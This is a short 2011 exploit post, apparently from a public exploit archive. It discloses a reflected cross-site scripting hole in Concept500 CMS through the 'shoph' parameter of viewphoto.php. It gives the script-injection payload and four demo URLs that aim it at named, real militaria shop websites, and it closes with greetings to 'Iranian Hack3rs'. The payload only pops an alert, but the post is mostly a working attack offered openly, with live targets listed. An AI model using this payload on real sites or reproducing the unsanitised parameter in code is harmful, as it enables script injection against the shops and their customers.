Home / exploits Concept500 CMS Cross Site Scripting
Posted on 12 August 2011
# Exploit Title: Concept500 CMS XSS Vulnerability # Date: 2011-08-11 # Author: Sepehr Security Team # Software Site: http://www.concept500.co.uk/ ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+ #Exploit: http://<=- Domain -=>/shop/viewphoto.php?shoph=id[XSS]&phqu=id #XSS: "> <script>alert(String.fromCharCode(88, 83, 83))</script> #Demo: http://www.clementsmilitaria.com/shop/viewphoto.php?shoph=50293"><script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=4 http://www.dbmilitaria.co.uk/shop/viewphoto.php?shoph=10242"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=2 http://www.dhbmilitaria.com/shop/viewphoto.php?shoph=50084"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=0 http://www.dorsetmilitaria.com/shop/viewphoto.php?shoph=50680"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=5 ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+ #Spc Tanx to All Sepehr Sceurity Team Members And All Iranian Hack3rs #wWw.Sepehr-Team.orG
